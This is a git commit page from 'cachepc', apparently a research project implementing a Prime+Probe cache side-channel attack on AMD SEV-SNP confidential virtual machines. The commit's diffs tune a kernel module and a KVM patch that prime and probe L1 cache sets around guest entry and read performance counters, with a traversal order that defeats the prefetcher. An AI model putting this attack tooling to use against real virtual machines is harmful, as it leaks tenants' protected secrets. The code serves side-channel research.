Add cache line ordering that prevents hardware prefetching, fix cachepc counts read - cachepc - Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines

	cachepc Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
	git clone https://git.sinitax.com/sinitax/cachepc
	Log \| Files \| Refs \| Submodules \| README \| sfeed.txt

commit 476f6c892d90e66fbd17ba616b82b000a990f63e
parent 0f3b9caf389b486541614836bf180b64544615cb
Author: Louis Burda <quent.burda@gmail.com>
Date:   Sat, 13 Aug 2022 20:05:27 +0200

Add cache line ordering that prevents hardware prefetching, fix cachepc counts read

Diffstat:
M kmod/cache_types.h  | 14 ++++++++------
M kmod/cachepc.c  | 5 +----
M kmod/cachepc.h  | 19 +++++++------------
M kmod/util.c  | 22 ++++++++++++++--------
M patch.diff  | 76 +++++++++++++++++++++++++++++++---------------------------------------------

5 files changed, 61 insertions(+), 75 deletions(-)
diff --git a/kmod/cache_types.h b/kmod/cache_types.h
@@ -22,9 +22,8 @@
 #define IS_LAST(flags) GET_BIT(flags, 1)
 #define IS_CACHE_GROUP_INIT(flags) GET_BIT(flags, 2)
 
-// Offset of the next and prev field in the cacheline struct
-#define CL_NEXT_OFFSET 0
-#define CL_PREV_OFFSET 8
+#define CL_NEXT_OFFSET offsetof(struct cacheline, next)
+#define CL_PREV_OFFSET offsetof(struct cacheline, prev)
 
 typedef enum cache_level cache_level;
 typedef enum addressing_type addressing_type;
@@ -53,12 +52,15 @@ struct cacheline {
     cacheline *next;
     cacheline *prev;
 
-    uint16_t cache_set;
-    uint16_t flags;
+    uint32_t cache_set;
+    uint32_t cache_line;
+    uint32_t flags;
 
     // Unused padding to fill cache line
     uint64_t count;
-    char padding[32];
+
+    char padding[24];
 };
 
 static_assert(sizeof(struct cacheline) == CACHELINE_SIZE, "Bad cache line struct size");
+static_assert(CL_NEXT_OFFSET == 0 && CL_PREV_OFFSET == 8);
diff --git a/kmod/cachepc.c b/kmod/cachepc.c
@@ -46,8 +46,6 @@ cache_ctx *
 cachepc_get_ctx(cache_level cache_level)
 {
 	cache_ctx *ctx;
-
-	// printk(KERN_WARNING "CachePC: Getting ctx..\n");
        
 	ctx = kzalloc(sizeof(cache_ctx), GFP_KERNEL);
 	BUG_ON(ctx == NULL);
@@ -72,8 +70,6 @@ cachepc_get_ctx(cache_level cache_level)
 	ctx->set_size = CACHELINE_SIZE * ctx->associativity;
 	ctx->cache_size = ctx->sets * ctx->set_size;
 
-	// printk(KERN_WARNING "CachePC: Getting ctx done\n");
-
 	return ctx;
 }
 
@@ -395,6 +391,7 @@ allocate_cache_ds(cache_ctx *ctx)
 	for (i = 0; i < ctx->nr_of_cachelines; ++i) {
 		cl_ptr_arr[i] = cl_arr + i;
 		cl_ptr_arr[i]->cache_set = get_virt_cache_set(ctx, cl_ptr_arr[i]);
+		cl_ptr_arr[i]->cache_line = i / ctx->sets;
 	}
 
 	return cl_ptr_arr;
diff --git a/kmod/cachepc.h b/kmod/cachepc.h
@@ -49,13 +49,12 @@ cachepc_prime(cacheline *head)
 {
     cacheline *curr_cl;
 
-    cachepc_cpuid();
+    //cachepc_cpuid();
     curr_cl = head;
     do {
         curr_cl = curr_cl->next;
-        cachepc_mfence();
     } while(curr_cl != head);
-    cachepc_cpuid();
+    //cachepc_cpuid();
 
     return curr_cl->prev;
 }
@@ -79,13 +78,12 @@ cachepc_prime_rev(cacheline *head)
 {
     cacheline *curr_cl;
 
-    cachepc_cpuid();
+    //cachepc_cpuid();
     curr_cl = head;
     do {
         curr_cl = curr_cl->prev;
-        cachepc_mfence();
     } while(curr_cl != head);
-    cachepc_cpuid();
+    //cachepc_cpuid();
 
     return curr_cl->prev;
 }
@@ -96,16 +94,14 @@ cachepc_probe(cacheline *start_cl)
 	uint64_t pre, post;
 	cacheline *next_cl;
 	cacheline *curr_cl;
-	volatile register uint64_t i asm("r12");
 
 	curr_cl = start_cl;
 
 	do {
 		pre = cachepc_read_pmc(0);
-		pre += cachepc_read_pmc(1);
 
 		cachepc_mfence();
-		cachepc_cpuid();
+		//cachepc_cpuid();
 		
 		asm volatile(
 			"mov 8(%[curr_cl]), %%rax \n\t"              // +8
@@ -123,13 +119,12 @@ cachepc_probe(cacheline *start_cl)
 		);
 
 		cachepc_mfence();
-		cachepc_cpuid();
+		//cachepc_cpuid();
 
 		post = cachepc_read_pmc(0);
-		post += cachepc_read_pmc(1);
 
 		cachepc_mfence();
-		cachepc_cpuid();
+		//cachepc_cpuid();
 
 		/* works across size boundary */
 		curr_cl->count = post - pre;
diff --git a/kmod/util.c b/kmod/util.c
@@ -20,16 +20,22 @@ prng_bytes(uint8_t *dst, size_t size)
 void
 random_perm(uint32_t *arr, uint32_t arr_len)
 {
-	uint32_t i, idx, tmp;
+	uint32_t i, mid; // idx, tmp;
 
-	for (i = arr_len - 1; i > 0; --i) {
-		prng_bytes((void*)&idx, 4);
-		idx = idx % i;
-
-		tmp = arr[idx];
-		arr[idx] = arr[i];
-		arr[i] = tmp;
+	/* defeat stream prefetcher by preventing access direction */
+	mid = arr_len / 2;
+	for (i = 0; i < arr_len; i++) {
+		arr[i] = mid + (i % 2 ? -1 : 1) * ((i + 1) / 2);
 	}
+
+	// for (i = arr_len - 1; i > 0; --i) {
+	// 	prng_bytes((void*)&idx, 4);
+	// 	idx = idx % i;
+
+	// 	tmp = arr[idx];
+	// 	arr[idx] = arr[i];
+	// 	arr[i] = tmp;
+	// }
 }
 
 void
diff --git a/patch.diff b/patch.diff
@@ -32,7 +32,7 @@ index b804444e16d4..17167ccfca22 100644
  obj-$(CONFIG_KVM)	+= kvm.o
  obj-$(CONFIG_KVM_INTEL)	+= kvm-intel.o
 diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
-index 7b3cfbe8f7e3..71697d08e9e4 100644
+index 7b3cfbe8f7e3..16dfd9b2938e 100644
 --- a/arch/x86/kvm/svm/svm.c
 +++ b/arch/x86/kvm/svm/svm.c
 @@ -2,6 +2,8 @@
@@ -44,31 +44,29 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644
  #include "irq.h"
  #include "mmu.h"
  #include "kvm_cache_regs.h"
-@@ -3785,8 +3787,18 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
+@@ -3785,8 +3787,13 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
  
  static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
  {
 -	struct vcpu_svm *svm = to_svm(vcpu);
-+	static struct cache_ctx *ctx = NULL;
-+	static struct cacheline *ds = NULL;
-+	static struct cacheline *head = NULL;
-+	static int run_index = 0;
++	struct cacheline *head;
 +	struct vcpu_svm *svm;
++	int cpu;
 +
 +	printk(KERN_WARNING "CachePC: svm_cpu_enter_exit()\n");
-+
-+	if (!ctx) ctx = cachepc_get_ctx(L1);
-+	if (!ds) ds = cachepc_prepare_ds(ctx);
  
 +	svm = to_svm(vcpu);
  	svm->vmcb->save.rax = vcpu->arch.regs[VCPU_REGS_RAX];
  	svm->vmcb->save.rsp = vcpu->arch.regs[VCPU_REGS_RSP];
  	svm->vmcb->save.rip = vcpu->arch.regs[VCPU_REGS_RIP];
-@@ -3835,8 +3847,14 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
+@@ -3835,8 +3842,19 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
  	 */
  	x86_spec_ctrl_set_guest(svm->spec_ctrl, svm->virt_spec_ctrl);
  
-+	head = cachepc_prime(ds);
++	cpu = get_cpu();
++	WARN_ON(cpu != 2);
++
++	head = cachepc_prime(cachepc_ds);
 +
  	svm_vcpu_enter_exit(vcpu, svm);
  
@@ -76,20 +74,13 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644
 +	//cachepc_print_msrmts(head);
 +	cachepc_save_msrmts(head);
 +
++	put_cpu();
++
  	/*
  	 * We do not use IBRS in the kernel. If this vCPU has used the
  	 * SPEC_CTRL MSR it may have left it on; save the value and
-@@ -3912,6 +3930,8 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
- 	if (is_guest_mode(vcpu))
- 		return EXIT_FASTPATH_NONE;
- 
-+	run_index += 1;
-+
- 	return svm_exit_handlers_fastpath(vcpu);
- }
- 
 diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
-index 2541a17ff1c4..a84a99f4b182 100644
+index 2541a17ff1c4..8c46d509bd13 100644
 --- a/virt/kvm/kvm_main.c
 +++ b/virt/kvm/kvm_main.c
 @@ -51,6 +51,9 @@
@@ -130,7 +121,7 @@ index 2541a17ff1c4..a84a99f4b182 100644
  __visible bool kvm_rebooting;
  EXPORT_SYMBOL_GPL(kvm_rebooting);
  
-@@ -4765,12 +4782,245 @@ static void check_processor_compat(void *data)
+@@ -4765,12 +4782,240 @@ static void check_processor_compat(void *data)
  	*c->ret = kvm_arch_check_processor_compat(c->opaque);
  }
  
@@ -189,10 +180,15 @@ index 2541a17ff1c4..a84a99f4b182 100644
 +	uint32_t *user;
 +
 +	/* l2 prefetches, hit or miss */
-+	cachepc_init_pmc(0, 0x60, 0x01);
++	// cachepc_init_pmc(0, 0x60, 0x01);
++
++	/* l2 data cache, hit or miss */
++	cachepc_init_pmc(0, 0x64, 0xD8);
 +
 +	user = p;
 +	
++	WARN_ON(user && *user >= L1_SETS);
++	if (user && *user >= L1_SETS) return;	
 +	ptr = cachepc_prepare_victim(cachepc_ctx, user ? *user : 48);
 +
 +	cachepc_mfence();
@@ -210,16 +206,6 @@ index 2541a17ff1c4..a84a99f4b182 100644
 +
 +	pre = cachepc_read_pmc(0);
 +
-+	//cachepc_mfence();
-+	//cachepc_cpuid();
-+
-+	//pre += cachepc_read_pmc(1);
-+
-+	//cachepc_mfence();
-+	//cachepc_cpuid();
-+
-+	//pre += cachepc_read_pmc(2);
-+
 +	cachepc_mfence();
 +	cachepc_cpuid();
 +
@@ -235,16 +221,6 @@ index 2541a17ff1c4..a84a99f4b182 100644
 +
 +	post = cachepc_read_pmc(0);
 +
-+	//cachepc_mfence();
-+	//cachepc_cpuid();
-+
-+	//post += cachepc_read_pmc(1);
-+
-+	//cachepc_mfence();
-+	//cachepc_cpuid();
-+
-+	//post += cachepc_read_pmc(2);
-+
 +	cachepc_mfence();
 +	cachepc_cpuid();
 +
@@ -267,7 +243,10 @@ index 2541a17ff1c4..a84a99f4b182 100644
 +	/* l2 data cache, hit or miss */
 +	cachepc_init_pmc(0, 0x64, 0xD8);
 +
++	WARN_ON(user && *user >= L1_SETS);
++	if (user && *user >= L1_SETS) return;	
 +	ptr = cachepc_prepare_victim(cachepc_ctx, user ? *user : 48);
++
 +	head = cachepc_prime(cachepc_ds);
 +	cachepc_victim(ptr);
 +	cachepc_probe(head);
@@ -281,6 +260,7 @@ index 2541a17ff1c4..a84a99f4b182 100644
 +void
 +kvm_cachepc_init(void *p)
 +{
++	cacheline *cl, *head;
 +	int cpu;
 +
 +	local_irq_disable();
@@ -292,6 +272,12 @@ index 2541a17ff1c4..a84a99f4b182 100644
 +	cachepc_ctx = cachepc_get_ctx(L1);
 +	cachepc_ds = cachepc_prepare_ds(cachepc_ctx);
 +
++	head = cl = cachepc_ds;
++	do {
++		cl = cl->next;
++		printk(KERN_WARNING "%i:%i\n", cl->cache_set, cl->cache_line);
++	} while (cl != head);
++
 +	kvm_cachepc_single_access_test(p);
 +	kvm_cachepc_single_eviction_test(p);
 +
@@ -378,7 +364,7 @@ index 2541a17ff1c4..a84a99f4b182 100644
  
  	r = kvm_arch_init(opaque);
  	if (r)
-@@ -4848,6 +5098,21 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+@@ -4848,6 +5093,21 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
  	r = kvm_vfio_ops_init();
  	WARN_ON(r);
  
@@ -400,7 +386,7 @@ index 2541a17ff1c4..a84a99f4b182 100644
  	return 0;
  
  out_unreg:
-@@ -4872,6 +5137,12 @@ EXPORT_SYMBOL_GPL(kvm_init);
+@@ -4872,6 +5132,12 @@ EXPORT_SYMBOL_GPL(kvm_init);
  
  void kvm_exit(void)
  {

M	kmod/cache_types.h	\|	14	++++++++------
M	kmod/cachepc.c	\|	5	+----
M	kmod/cachepc.h	\|	19	+++++++------------
M	kmod/util.c	\|	22	++++++++++++++--------
M	patch.diff	\|	76	+++++++++++++++++++++++++++++++---------------------------------------------